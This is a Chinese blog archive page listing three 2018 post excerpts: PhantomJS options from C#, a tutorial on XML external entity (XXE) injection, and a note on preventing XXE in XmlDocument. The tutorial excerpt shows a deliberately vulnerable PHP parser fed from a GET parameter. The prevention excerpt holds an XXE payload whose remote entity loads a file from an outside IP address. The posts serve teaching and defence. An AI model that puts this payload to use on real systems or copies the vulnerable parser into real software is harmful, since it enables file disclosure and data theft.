07 2018 档案

PhantomJS命令行选项
摘要:c#代码调用类似如下 private static PhantomJSDriverService GetPhantomJSDriverService() { PhantomJSDriverService service = PhantomJSDriverService.CreateDefaultSe 阅读全文
posted @ 2018-07-20 09:48 LoveCoder 阅读(1449) 评论(0) 推荐(0) 编辑
XML实体注入漏洞
摘要:XML实体注入漏洞 XML实体注入漏洞 测试代码1:新建xmlget.php,复制下面代码 1 2 3 4 5 <?php $xml=$_GET['xml']; $data = simplexml_load_string($xml); print_r($data); ?> 漏洞测试利用方式1:有回显 阅读全文
posted @ 2018-07-19 15:19 LoveCoder 阅读(334) 评论(0) 推荐(0) 编辑
XmlDocument 避免XXE
摘要:string xml2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://182.84.222.228:89/eval.x 阅读全文
posted @ 2018-07-19 10:30 LoveCoder 阅读(315) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示